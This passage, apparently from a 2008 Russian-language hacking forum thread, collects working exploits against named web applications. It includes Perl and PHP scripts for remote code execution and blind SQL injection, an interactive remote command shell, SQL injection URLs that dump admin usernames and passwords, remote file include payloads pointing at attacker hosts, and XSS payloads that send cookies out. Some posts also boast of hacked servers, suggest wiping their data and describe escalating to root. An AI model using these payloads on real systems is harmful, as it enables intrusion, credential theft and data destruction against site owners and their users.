PeerAddr => $host,
PeerPort => $port,
Proto => "tcp"
) or print $err1 and end();
print $req1 "$poti", "\r\n";
print $req1 "Host: $host", "\r\n";
print $req1 "Content-Type: application/x-www-form-urlencoded", "\r\n";
print $req1 "Content-Length: $ldat", "\r\n\n";
print $req1 "$pdat", "\r\n";
close($req1);

# Results
$req2 = get("http://".$host.$path."/thisismypasswd.txt") or print $err3 and end();
open(f, ">VUBB_RESULT.txt");
print f $req2;
close(f);
print "[+]Done: VUBB_RESULT.txt\r\n";
end();

# Bye
sub end {
print "+---------------------------------------+", "\r\n";
exit;
}

iddqd

23.01.2008, 19:14

Vendor: http://sourceforge.net/project/platformdownload.php?group_id=204083

Remote SQL Injection

Vulnerable: LulieBlog Version 1.02

Exploit:

http://Sitename/voircom.php?id=-1%27union/**/select/**/0,concat(nom_parametre,0x3a,0x3a,valeur_parametre) ,2,3,4,5/**/from/**/lulieblog_parametres/*

iddqd

23.01.2008, 19:16

Vendor: http://www.iranscripts.com/download/Foojan-WMS1.0%20Full.rar

Remote Sql Injection

Vulnerable: Foojan WMS 1.0

Exploit:

http://Sitename/index.php?story=1%27union/**/select/**/0,concat(0x55736572203a20,UserName,0x202b205061737 3776f7264203a,PassWord),2,3,4,5,6,7,8/**/from/**/authors/*

iddqd

24.01.2008, 19:03

SQL Injection

Vulnerable: WSN Guest 1.21

Exploit:

-1/**/UNION/**/SELECT/**/name,password,null,null,null,null,null,null,null,n ull,null/**/FROM/**/wsnguest_members/*

iddqd

25.01.2008, 03:04

Vendor: http://tpns.k-na.se/

SQL Injection

Vulnerable: probably all:)

Exploit:

http://localhost/?page=newscat&catid=-666%20union%20select%20passwd%20fr
om%20user

iddqd

02.02.2008, 23:56

The Everything Development System <= Pre-1.0 SQL Injection

Exploit:

http://milw0rm.com/exploits/5037

BookmarkX script 2007 (topicid) Remote SQL Injection

Exploit:

http://milw0rm.com/exploits/5040

BlogPHP v.2 (id) XSS / Remote SQL Injection

Exploit:

http://milw0rm.com/exploits/5042

//(с)вежачок от milw0rm.com

iddqd

03.02.2008, 00:19

Nabopoll 1.2

Vendor: www.nabocorp.com/nabopoll/

Blind SQL Injection

Exploit:

<?
# Nabopoll Blind SQL Injection P0C Exploit
# Download: www.nabocorp.com/nabopoll/
# coded by s0cratex
# Contact: s0cratex@hotmail.com

error_reporting(0);
ini_set("max_execution_time",0);

// just change the default values...
$srv = "localhost"; $path = "/poll"; $port = 80;
$survey = "8"; //you can verify the number entering in the site and viewing the results...

echo "================================================== \n";
echo "Nabopoll SQL Injection -- Proof of Concept Exploit\n";
echo "--------------------------------------------------\n\n";
echo " -- MySQL User: ";
$j = 1; $user = "";
while(!strstr($user,chr(0))){
for($x=0;$x<255;$x++){
$xpl = "/result.php?surv=".$survey."/**/AND/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(user(),".$j.",1))=".$x."),1,0)))/*";
$cnx = fsockopen($srv,$port);
fwrite($cnx,"GET ".$path.$xpl." HTTP/1.0\r\n\r\n");
while(!feof($cnx)){ if(ereg("power",fgets($cnx))){ $user.=chr($x);echo chr($x); break; } }
fclose($cnx);
if ($x==255) {
die("\n Try again...");
}
}
$j++;
}
echo "\n";
?>

RFI

PoC:

http://www.site.com/[path]/survey.inc.php?path=http://shell.txt?

Admin without password

http://target/nabopoll/admin/config_edit.php
http://target/nabopoll/admin/template_edit.php
http://target/nabopoll/admin/survey_edit.php

*Доступ к этим файлам может получить любой пользователь, без пароля

***

PollMentor v2.0

Vendor: http://www.aspindir.com/indir.asp?id=4406

PoC:

http://[site]/[script-path]/pollmentorres.asp?id=-1+UPDATE+poll+SET+question='HekId';--

***

Advanced Poll <= 2.0.5

Vulnerable: Advanced Poll 2.0.0 >= 2.0.5

Remote Code Execution

Exploit:

#!/usr/bin/perl -w
# Advanced Poll 2.0.0 >= 2.0.5-dev textfile RCE.
#
# date: 30/07/06
#
# diwou <diwou@phucksys.org>
#
# PHCKSEC (c) 2001-2006.
#
# Hey, what a mad world!
#

use strict;
use warnings;
use LWP::UserAgent;
use MD5;

#
# args: http://url/apoll_path cmd
#
# proxy: export PROXY='http|https://www.my.big.and.famous.proxy:8080/'
# url: http|https://tatget:(port)/phppoll/
#

die("RTFC! ;)") unless(@ARGV>1);

my ($lwp,$agent,$out,$res,$url,$cmd)=(undef,undef,und ef,undef,$ARGV[0],$ARGV[1]);

my %ipost=
(
poll_tplset => 'default',
'tpl[display_head.html]' =>
<<HEAD
\\".system(getenv(HTTP_PHP)).exit().\\"
<table width="\$pollvars[table_width]" border="0" cellspacing="0" cellpadding="1" bgcolor="\$pollvars">
<tr align="center">
<td><style type="text/css">

</style><font face="\$pollvars[font_face]" size="-1" color="#FFFFFF"><b>\$pollvars[title]</b></font></td>
</tr>
<tr align="center">
<td>
<table width="100%" border="0" cellspacing="0" cellpadding="2" align="center" bgcolor="\$pollvars[bgcolor_tab]">
<tr>
<td height="40" valign="middle"><font face="\$pollvars[font_face]" color="\$pollvars[font_color]" size="1"><b>\$question</b></font></td>
</tr>
<tr align="right" valign="top">
<td>
<form method="post" action="\$this->form_forward">
<table width="100%" border="0" cellspacing="0" cellpadding="0" align="center">
<tr valign="top" align="center">
<td>
<table width="100%" border="0" cellspacing="0" cellpadding="1" align="center">
HEAD
,
action => '',
tplset => 'default',
tpl_type => 'display',
session => '',
uid => 1
);

my %epost=
(
session => '',
uid => 1,
poll_tplst => 'default',
tpl_type => 'display',
);

my %zday=
(
username => 'jakahw4nk4h',
'pollvars[poll_username]' => 'jakahw4nk4h',
password => 'fuckoff',
'pollvars[poll_password]' => ''
);

$zday{'pollvars[poll_password]'}=&md5($zday{password});
$agent="Hey IDS! i'm gonna fuck your advanced poll right? B===D"; # post method doesnt log it, so doesnt matter.
#$agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1";

$lwp=new LWP::UserAgent();
$lwp->agent($agent);
$lwp->timeout(10);
$lwp->protocols_allowed(['http','https']);

if($ENV{PROXY})
{
$lwp->proxy(['http','https'],$ENV{PROXY});
print "Using proxy ".$ENV{PROXY}."\n";
}

$url.="/" if($url!~/\/$/);
$url.="admin/index.php";
print "Doing some pretty with ".$url."...\n\n";

print "+ generating session...\n";
$out=$lwp->post($url,\%zday)->content();
if($out=~ /index\.php\?session=((.){32})/)
{
$ipost{'session'}=$epost{'session'}=$1;
print " session: ".$ipost{'session'}."\n";

$url=~s/index\.php/admin_templates\.php/g;
print "+ injecting diplay_head.html template...\n";
$out=$lwp->post($url,\%ipost)->content();
$epost{'action'}=$1 if($out=~ /<input type="submit" name="action" value="(.*)" class="button">/);
print " button: ".$epost{'action'}."\n";

$url=~s/admin_templates\.php/admin_preview\.php/g;
print "+ executing...\n";
$out=$lwp->post($url,\%epost,PHP => "echo BOCE;".$cmd.";echo EOCE")->content();

print "-- BOCE --\n";
foreach $out (split(/\n/,$out))
{
$res=1,next if($out=~/BOCE/);
$res=0,next if($out=~/EOCE/);
print $out."\n" if($res);
}
print "-- EOCE --\n";
}
else
{
print "don't worry, u can improve me! eh eh eh :D?\n";
}

sub md5
{
$_=new MD5;
$_->add(@_);
return unpack("H*",$_->digest());
}

[B]Remote Admin Session Generator

Exploit:

#!/usr/bin/perl -w
# Advanced Poll 2.0.0 >= 2.0.5-dev textfile admin session gen.
#
#
# 0day! KEEP IT PRIVATE 0day!
#
# date: 30/07/06
#
# diwou <diwou@phucksys.org>
#
# PHCKSEC (c) 2001-2006.
#
# see templates for code execution ;).

use strict;
use warnings;
use LWP::UserAgent;
use MD5;

my ($lwp,$agent,$out,$url,$proxy)=(undef,undef,undef, $ARGV[0],$ARGV[1]);
my %zday=
(
username => 'jakahw4nk4h',
'pollvars[poll_username]' => 'jakahw4nk4h',
password => 'fuckoff',
'pollvars[poll_password]' => ''
);
$zday{'pollvars[poll_password]'}=&md5($zday{password});
$agent="Hey IDS! i'm gonna fuck your advanced poll right? B===D"; # post method doesnt log it, so doesnt matter.
#$agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1";

#
# args: url proxy(optional)
#
# url: http|https://tatget:(port)/phppoll/
# proxy: http|https://hostname:(port)/
#
die("RTFC! ;)") unless(@ARGV);

# some lwp routines...
$lwp=new LWP::UserAgent();
$lwp->agent($agent);
$lwp->timeout(10);
$lwp->protocols_allowed(['http','https']);
$lwp->proxy(['http','https'],$proxy) if(@ARGV>1);

$url.="/" if($url!~/\/$/);
$url.="admin/index.php";
print "Using proxy ".$proxy."\n" if($proxy);
print "Doing some pretty with ".$url."...\n\n";

$out=$lwp->post($url,\%zday)->content();
if($out=~ /index\.php\?session=((.){32})/)
{
print "well, you are a bigone ;).\n";
print "try: ".$url."?session=".$1."&uid=1\n";
}
else
{
print "don't worry, u can improve me! eh eh eh :D?\n";
}

sub md5
{
$_=new MD5;
$_->add(@_);
return unpack("H*",$_->digest());
}

RFI

Vulnerable: Advanced Poll 2.0.2

PoC:

http://www.example.com/[path_advanced_poll]/admin/common.inc.php?base_path=http:www.example.com

***

Flipper Poll v1.1.0

Vendor: http://sourceforge.net/project/showfiles.php?group_id=59828

RFI

PoC:

/poll.php?root_path=evilscripts?

***

Vote-Pro 4.0

Vendor: http://www.vote-pro.com/

Remote Code Execution

Exploit:

use IO::Socket;

$port = "80"; # connection port
$target = shift; # vote-pro.com
$folder = shift; # /votepro/

sub Header()
{
print q
{Vote-Pro Code Injection Exploit - writ3r [at] gmail.com
-------------------------------------------------------
};
}

sub Usage()
{
print q
{
Usage: votecmd.pl [target] [directory]
Example: votecmd.pl vote-pro.com /votepro/
};
exit();
}

Header();

if (!$target || !$folder) {
Usage(); }

print "[+] Connecting...\n";
$cmd = "dir";
while ($cmd !~ "exit")
{
$xpack = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect on exploit attempt. Exiting...\r\n";
print $xpack "GET ".$folder."poll_frame.php?poll_id=hyphy;system($_GET[com]);&com=".substr($cmd, 0, -1)."; HTTP/1.1\n";
print $xpack "Host: $target\n";
print $xpack "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $xpack "Accept: text/html\n";
print $xpack "Connection: keep-alive\n\n";

print "[cmd]\$ ";
$cmd = <STDIN>;
$cmd =~ s/ /%20/g;
}

print "[!] Connection to host lost...\n";

***

LunarPoll 1.0

Vendor: http://dexxaboy.com/scripts/lunarpoll/download/

RFI

PoC:

show.php?PollDir=http://attacker.txt?

***

cwmVote 1.0

Vendor: http://explorer.cwm-design.de/dirs/41/cwmVote.rar

RFI

PoC:

http://[target]/[cwm_vote_path]/archive.php?abs=http://[Shellscript]

***

Absolute Poll Manager

Vendor: http://www.xigla.com/absolutepm/

XSS

Vulnerable: XIGLA SOFTWARE Absolute Poll Manager XE 4.1

PoC:

http://www.example.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=<script>alert("running+code +within+the+context+of+"%2bdocument.domain)</script>

http://www.example.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=<script>location="http://www.example2.com/?"%2bdocument.cookie</script>

http://www.example.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=%3cscript%3elocation=%22htt p%3a//www.%65xample%2ecom/?%22%2bdocument.cookie%3c/script%3e&

***

PHPCentral Poll Script

Vendor: http://www.phpcentral.org/scripts.php

Remote Command Execution

Vulnerable: PHPCentral Poll Script v1.0

PoC:

http://www.example.com/poll.php?_SERVER[DOCUMENT_ROOT]=http://evil.txt?&
cmd=id

http://www.example.com/pollarchive.php?_SERVER[DOCUMENT_ROOT]=http://evi
l.txt?&cmd=id

***

X-Scripts X-Poll

SQL Injection

PoC:

http://www.example.com/poll/top.php?poll=' AND 0 UNION SELECT 0, '%3C%3Fsystem%28%24_GET%5B%22c%22%5D%29%3B%3F%3E' , 1, 2, 3, 4, 5, 6, 7, 8,'' INTO
OUTFILE '/usr/webserver/public_htm/rshell.php

***

Comdev Vote Caster

Vendor: http://www.comdevweb.com/votecaster.php

SQL Injection

Vulnerable: Comdev VoteCaster 3.1

PoC:

http://www.example.com/index.php?pageaction=results&campaign_id=[SQL]

***

AzDGVote

RFI

PoC:

http://www.example.com/poll/view.php?int_path=http://attacker
http://www.example.com/ordinaopenpodcast/script/poll/view.php?int_path=http://attacker

***

Sleep

11.02.2008, 02:03

Active XSS 4images 1.7.6 Скорей всего и ранние версии
1 В настройках профиля(Control Panel)
в поле Homepage:<img src="javascript:alert(document.cookie)"width=0>
Тестил на Opere 9.50 beta/9.21 & IE6 на Лисе не пашет =(
2 В поле Description:
<a href=www. style="/**/back\g\r\o\u\nd/**/:/**/\u/**/\r/**/\l/**/\(/**/\j/**/a/**/v/**/a/**/s/**/c/**/\r/**/\i\p/**/\t\:/**/a/**/\l/**/e/**/\r/**/\t/**/\(/**/\/**/document.cookie/**/\/**/)/**/\/**/)">
тока под IE
ыы первая бага найденая мной :D

l1ght

19.02.2008, 14:02

wow-ultimate; версии: все.
/rename.php
//Проверка аккаунта
mysql_select_db($config['db_realmd']);
$query = "SELECT * FROM `account` WHERE `username`='".$acc."';" ;
скуля пост+слепая, однако на всех взломанных серверах хватило прав на into dumpfile :)
дефолтные пути:
Z:\home\[serverip]\www\
W:\home\[serverip]\www\
C:\server\mangos\diskw\www\
C:\server\diskw\www\
под никсами чаще всего
/usr/home/server/

dreammangos: версии (?)
пхп иньекции в компонентах
/media/addgalwall.php
/media/addgalscreen.php
(компоненты дефолтные) нет проверки на расширения файлов.

/ps не забудте сделать вайп :)
delete from `characters`.`character` where 1

xcedz

14.03.2008, 23:14

EasyCalendar <= 4.0tr - Multiple Remote Vulnerabilities
-------------------------------
HomePage: http://myiosoft.com
Exploit: Multiple Remote Vulnerabilities [High]
Verified in localhost with EsayCalendar 4.0tr and magic_quotes Off
Remote SQL Injection:

Vuln File: calendar_backend.php
Exploit: http://localhost/PATH/plugins/calendar/calendar_backend.php?pageec=dayview&month=2&year=-1[SQL]

Example:
-1+union+all+select+1,2,3,concat(username,char(54), password),5,6,7,8,9,0,1+from+dbpfixajaxp_users/*
-------------------------------------
Blind SQL Injection:

Vuln File: ajaxp_backend.php

Exploit: http://localhost/PATH/ajaxp_backend.php?page=

Example: 1+and+1%3D0
-------------------------------------
Cross Site Scripting:

Vuln File: calendar_backend.php
Exploit: http://localhost/PATH/plugins/calendar/calendar_backend.php?pageec=dayview&day=[XSS]

Example: >'><ScRiPt%20%0a%0d>alert("JosS")%3B</ScRiPt>
=========================================
[B]EasyGallery 5.00tr
возможно более ранние версии

Опасность: Средняя

Наличие эксплоита: Да

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "catid" в сценарии staticpages/easygallery/index.php (когда параметр "page" установлен в значение "category"). Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:

http://[host]/staticpages/easygallery/index.php?page=category&PageSection=0&catid=[SQL]

2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "q" и в URL в сценарии staticpages/easygallery/index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

URL производителя: myiosoft.com/?1.9.0.0

Решение: Способов устранения уязвимости не существует в настоящее время.

=============================================

Qwazar

11.05.2008, 13:37

Раскрытие пути в Sypex Dumper Lite 1.0.8:

Если скриптом хоть раз пользовались то:

http://site/backup/dumper.cfg.php

"backup/dumper.cfg.php" - относительно расположения файла dumper.php .

Также, при неправильном вводе пароля виден DBHOST и есть возможность вводить теги в поле логина, но смысла в этом особого нет, т.к. длина режется до 16 символов.

xcedz

11.05.2008, 22:18

mamba.ru
-------------------
ищем в гугле
journal/contentcategory.phtml?cat_id=
пассивная xss
site.com/journal/contentcategory.phtml?cat_id=5[код]

Solide Snake

27.05.2008, 17:24

Продукт: OneCMS
Версия: 2.5
Производитель: http://www.insanevisions.com/
Воздействие: Local File Include

Ошибка присутствует в скрипте install_mod.php

Пример:

http://site.ru/onecms/install_mod.php?act=go&load=shell.php../../../../../../../../../../../../../etc/passwd

Solide Snake

27.05.2008, 18:03

Продукт: TAGWORX.CMS
Версия: 3.00.02
Производитель: http://www.tagworx.net/
Воздействие: Remote SQL Injection

Ошибка существует из-за недостаточной обработки данных в параметре "cid" в скрипте contact.php и в параметре "nid" в скрипте news.php

Пример:

http://site.ru/contact.php?cid=-1+UNION+SELECT+concat_ws(char(58),id,user_nick,use r_pass,concat(user_prename,char(0x20),user_name))+ from+t_user--
http://site.ru/news.php?nid=-1+UNION+SELECT+1,2,3,concat_ws(char(58),id,user_ni ck,user_pass,concat(user_prename,char(0x20),user_n ame)),5,6+from+t_user--

l1ght

30.05.2008, 16:22

wow-ultimate <= 2.0

sql inj:
gilds.php?guid=[sql]

WOLK site <=(4.0)

local file including:
lk_n?nw=../../../../mangos/mangosd.conf%00
lk_s?file=../../../../mangos/mangosd.conf%00
lk_u?page=../../../../mangos/mangosd.conf%00
последняя версия распостраняется с ipb 2.3.4 - регистрируемся на форуме, прикрепляем к посту file.txt с пхп кодом, идем по адресу:
http://site/forum/uploads/monthly_05_2008/
*через 2 дня _06_2008 =) ищем наш файл в формате .ipb, и инклудим его.

Dimi4

02.06.2008, 21:05

Биллинговая система UTM от фирмы NetUp

Множественные уязвимости в NetUP
Программа: NetUP
Опасность: Критическая

Описание: Несколько уязвимостей обнаружено в NetUP. Злонамеренный пользователь может получить доступ к системе и манипулировать учетной записью пользователя.

Сценарии "admin" and "utm_stat” не проверяют "sid" параметр. В результате злонамеренный пользователь может внедриться в сессию другого пользователя через SQL инъекцию:
https://[server]/cgi-bin/utm/admin?cmd=full_view&sid=q%22%20OR%201=1%20OR%20%22q%22=%22q
https://[server]/cgi-bin/utm/utm_stat?cmd=user_report&sid=q%22%20OR%201=1%20OR%20%22q%22=%22q
2. Удаленный пользователь может изменять данные других пользователей, используя уязвимость SQL инъекции в '/cgi-bin/utm/user_stat' script сценарии:
https://[server]/cgi-bin/utm/utm_stat?cmd=change_lang?=ru%22,%20bill=10000,%20l ang=%22ru&sid=sessionid
Также сообщается, что множество других сценариев уязвимы к SQL инъекции.

UTM allows its administrators to setup firewall rules. Administrator enters
the parameters for ipchains (in case if Linux) or ipfw (FreeBSD) into
webform, and they are stored in MySQL, and executed with help of sudo. A
malicious administrator can add semicolon and any shell commands to the
firewall rule, and this commands will be executed with uid of httpd process
owner.
However, altering firewall rules is disabled in UTM by default. In this case
an attacker can use more complicated way to execute commands:
The problem is that UTM configuration options from /netup/utm/utm.cfg are
exported to global variables after parsing. This happens on each startup of
aaa, admin or utm_stat. After this, dictionary data for corresponding language
is selected from table dict. This data is also exported to global variables.
Column "variable" becomes variable name, and column "value" its value. So, if
one has access to table dict, he can override configuration options from
/netup/utm/utm.cfg. Overriding option sudo_path allows an attacker to
execute shell commands on server running UTM.
Web interface /cgi-bin/utm/admin allows only to change column value of table
dict. But, further examination shows that admin?cmd=dict_change, is subject
to SQL injection similar to utm_stat?cmd=change_lang, described above.
Passing parameter like

value506='touch /tmp/hacked; /usr/local/bin/sudo", variable="sudo_path'

to admin?cmd=dict_change will rewrite global variable sudo_path, and
'touch /tmp/hacked' will be executed with next call to sudo. The HTTP query
itself is very big, because all rows in table dict are changed with one
query (stupid!), so the query won't be shown here.

-------
Gaining root access

Once an attacker can execute shell commands with uid of httpd process
owner (usually nobody), in most cases he can gain a root shell. The problem
is that in all boxes running UTM sudoers file contains a line:

nobody ALL= NOPASSWD: /bin/mv

So moving from httpd uid to uid 0 is quite easy.

(I don't really know reason for this, but it is even suggested to do it
on vendor's website http://www.netup.ru/?fid=31)

Qwazar

25.06.2008, 20:16

Статистика/счётчик Firestats 1.4.4-stable:

XSS:
http://site/stats/php/window-delete-site.php?site_id=')"><script>alert(/XSS/)</script>
http://site/stats/php/window-new-edit-site.php?site_id="><script>alert(/XSS/)</script>
http://site/stats/lib/ip2c/test-ip.php?ip=<script>alert(/XSS/)</script>
Возможность узнать префикс БД, имя пользователя БД и хост:
http://site/stats/php/page-database.php
http://site/stats/tools.php?file_id=system_test (только префикс)
Если админ криворукий, можно добавить новго админа тут:http://site/stats/tools.php?file_id=manage_usersУзнать мыло админа и юзеров (не баг, но поидее этого не должно быть):

http://site/stats/php/page-users.php
http://site/stats/php/window-edit-user.php?user_id=1
Раскрытие пути:
stats/integration/mediawiki/firestats-mediawiki.php
stats/php/tabbed-pane.php
stats/php/tools-menu.php
stats/firestats-wordpress.php
stats/php/ip2country.php
stats/php/footer.php
status.php
stats/php/page-stats.php
stats/login.php
stats/php/page-add-admin.php
stats/firestats-gregarius.php
stats/lib/ip2c/benchmark.php
stats/lib/ezsql/mysql/ez_sql_mysql.php
З.Ы.
Папка со статистикой может называться и не stats. Багов больше, толком не рылся, это то, что сразу на глаза попалось.

baltazar

04.08.2008, 22:28

Уязвимости выкладываю в порядке мною нахождения их:)Все проверялись на версии 2.2.5
XSS:
Post-запрос на странице http://site/dspLogs.php
"><script>alert(document.cookie)</script>
В полях: Host, Referrer, Agent Information, res, colo, online, mp

XSS:
http://site/dspLogs.php?S_hostname=%22%3E%3Cscript%3Ealert(doc ument.cookie)%3C/script%3E
http://site/dspLogs.php?S_referer=%22%3E%3Cscript%3Ealert(docu ment.cookie)%3C/script%3E
http://site/dspLogs.php?S_agent=%22%3E%3Cscript%3Ealert(docume nt.cookie)%3C/script%3E
http://site/dspLogs.php?S_res=%22%3E%3Cscript%3Ealert(document .cookie)%3C/script%3E
http://site/dspLogs.php?S_color=%22%3E%3Cscript%3Ealert(docume nt.cookie)%3C/script%3E
http://site/dspLogs.php?S_online=%22%3E%3Cscript%3Ealert(docum ent.cookie)%3C/script%3E
http://site/dspLogs.php?S_mp=%22%3E%3Cscript%3Ealert(document. cookie)%3C/script%3E

Также нашел интересные мета-теги:
<meta name="PHP Version" content="..." />
<meta name="MYSQL Version" content="..." />

Странная ксс:
На странице http://site/dspStats.php?edit=mp в логах посещений фильтруется информация про страницы сайта,если счетчик установленный на индексной странице то можно указать код в качестве адреса страницы)
http:/site/<script>alert(document.cookie)</script>

Вобщем так

http://site/dspStats.php?edit=%22%3E%3Cscript%3Ealert(document .cookie)%3C/script%3E

Full path disclosure:
http://site/include/edCss.inc.php

http://site/include/foot.inc.php

http://site/include/get_csscolors.inc.php

http://site/include/head.inc.php

http://site/include/head_stuff.inc.php

http://site/include/loglist.inc.php

http://site/include/pphlogger_send.inc.php

http://site/modules/usercreate.php

http://site/modules/htmlMimeMail.php

http://site/modules/img_vis_per_hour.mod.php

http://site/edit_user.php

http://site/main-dummy.php

http://site/main.php

http://site/modules/htmlMimeMail.php

http://site/modules/img_vis_per_hour.mod.php

http://site/modules/usercreate.php

Еще XSS(найденые мною давно):

Post запрос на странице http://site/edUserprofile.php (возможны как Get так и Post запросы)

</textarea><script>alert(document.cookie)</script>
В параметре N_your_url

"><script>alert(document.cookie)</script>
В параметрe N_email

"><script src=http://site.com
В параметрах N_fg_c, N_bg_c (ограничение в 30 символов)

XSS:

http://site/edCss.php?css_str=12%22%3E%3Cscript%3Ealert(docume nt.cookie)%3C/script%3E&action=edit

SQL Injection:
http://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null%20from%20pphl_users%20limit%200,1&action=edit

DoS:

http://site/newaccount_self.php

Скрипт редеректит сам себя.Mozilla автомаматический останавливает процесс,а вот ИЕ-нет.Поэтому если клиент,который обращается к скрипту сам не остановит редирект(например какой-то бот поисковых систем) то создается большая нагрузка на сервер.

Information Leakage:

http://site/main_location.inc

XSS:

http://site/dspLogs.php/%22%3E%3Cscript%20src=script.js%20

http://site/dspStats.php/%22%3E%3Cscript%20src=script.js%20

http://site/edCss.php/%22%3E%3Cscript%20src=script.js%20
Данные ксс возможны в связи с использованием в скриптах $PHP_SELF.

baltazar

05.08.2008, 17:12

XSS:
http://site/bookmarks/%3CBODY%20onload=alert(document.cookie)%3E
http://site/?sort=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Вводим в поиске следующий пост запрос
</textarea><script>alert(document.cookie)</script>

Local File Inclusion:
http://site.com/help/syntax.html?la=/../query

baltazar

11.08.2008, 14:27

XSS:

http://site/catalog/index.cgi?search=%3Cscript%3Ealert(document.cookie )%3C/script%3E&sparam=all&category=cat20

http://site/catalog/add-lnk.cgi?cmd=sendpassword&id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/catalog/add-lnk.cgi?cmd=edit&id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/catalog/admin.cgi?cmd=%22%3E%3Cscript%3Ealert(document.coo kie)%3C/script%3E

Активка:
На странице http://site/catalog/add-lnk.cgi?cmd=showform пишем
<BODY onload=alert(document.cookie)
В полях: Название ресурса, URL, Регион, Описание сайта.

baltazar

11.08.2008, 18:46

XSS:

http://site/account/index.html?user=%3Cscript%3Ealert(document.cookie) %3C/script%3E
http://site/account/index.html?drop=%3E%3Cscript%3Ealert(document.cook ie)%3C/script%3E

baltazar

12.08.2008, 01:35

XSS:
http://site/news/search.php3?site=x&bn=y_news&gosearch=1&sf=1&pattern=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/static/list.php?key=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/news/login.php3?site=x&bn=y_news&loginform=1&loginuser=%22%3E%3Cscript%3Ealert(document.cookie) %3C/script%3E

http://site/news/login.php3?site=x&bn=y_news&loginform=1&loginpassword=%22%3E%3Cscript%3Ealert(document.coo kie)%3C/script%3E

http://site/news/login.php3?site=x&bn=y_news&loginform=1&redirect_url=%22%3E%3Cscript%3Ealert(document.cook ie)%3C/script%3E

http://site/news/login.php3?site=x&bn=y_news&loginform=1&editsite=%22%3E%3Cscript%3Ealert(document.cookie)% 3C/script%3E

http://site/news/login.php3?site=x&bn=y_news&loginform=1&userid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

SQL:
http://site/news/search.php3?site=x&bn=y_news&gosearch=1&sf=1&pattern=xxxxxxxxxx

Full path disclosure:

http://site/static/list.php?key=-1102352364

baltazar

13.08.2008, 01:24

XSS:
Уязвимости в параметрах prot, host, path, name, ext, size, search_days, show_page

http://site/?prot=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/?host=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/?path=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/?ext=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/?size=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/?search_days=%22%3E%3Cscript%3Ealert(document.cook ie)%3C/script%3E

http://site/?show_page=%27%3E%3Cscript%3Ealert(document.cookie )%3C/script%3E

~!DoK_tOR!~

25.08.2008, 22:57

Web Directory Script <= 2.0 (name) SQL Injection Vulnerability

magic_quotes_gpc = Off

http://localhost/[installdir]/

Exploit:

listing_view.php?name='+union+select+1,concat_ws(0 x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,1 4,15+from+members/*

http://milw0rm.com/exploits/6298

Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities

magic_quotes_gpc = Off

http://localhost/[installdir]/

Exploit:

index.php?category='+union+select+1,2,user(),4,5,6 ,7,8,9,10,11,12,13/*

index.php?type='+union+select+1,2,user(),4,5,6,7,8 ,9,10,11,12,13/*

Dork:

made by matterdaddy

http://milw0rm.com/exploits/6297

(c)~!Dok_tOR!~

~!DoK_tOR!~

26.08.2008, 19:21

iFdate <= 2.0.3 Remote SQL Injection Vulnerability

Condition: magic_quotes_gpc = Off

http://localhost/[installdir]/members_search.php

Search Name/Nickname

Exploit 1:

' union select 1,concat_ws(0x3a,admin_username,admin_password),3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55, 56,57,58 from ifdate_admins/*

Exploit 2:

' union select 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,4 3,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from ifdate_users/*

http://milw0rm.com/exploits/6315
(c) ~!Dok_tOR!~

~!DoK_tOR!~

12.09.2008, 19:09

Battle Scrypt SQL Injection

Author: ~!Dok_tOR!~
Date found: 26.08.08
Product: Battle Scrypt
Download script: _http://rapidshare.com/files/114200827/BattleScrypt_PHP_NULLIFIED.rar.html
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

http://localhost/[installdir]/search.php

Model Name:

Exploit:

' union select 1,user(),3/*

http://localhost/[installdir]/stats.php?id=' union select 1,2,3,4,5,6,7,8,9,10,11/*

Big Fat Rate My Photo AdSense Website SQL Injection

Author: ~!Dok_tOR!~
Date found: 29.08.08
Product: Big Fat Rate My Photo AdSense Website
Price: $14.99
URL: www.dotcomallsorts.com
Download script: _http://89.223.37.140/files/scripter/Big%20Fat%20Rate%20My%20Photo%20AdSense%20Website. rar
Vulnerability Class: SQL Injection

Exploit 1:

http://localhost/[installdir]/viewcomments.php?phid=-1+union+select+1,concat_ws(0x3a,username,password) ,3,4,5,6+from+admin/*

Exploit 2:

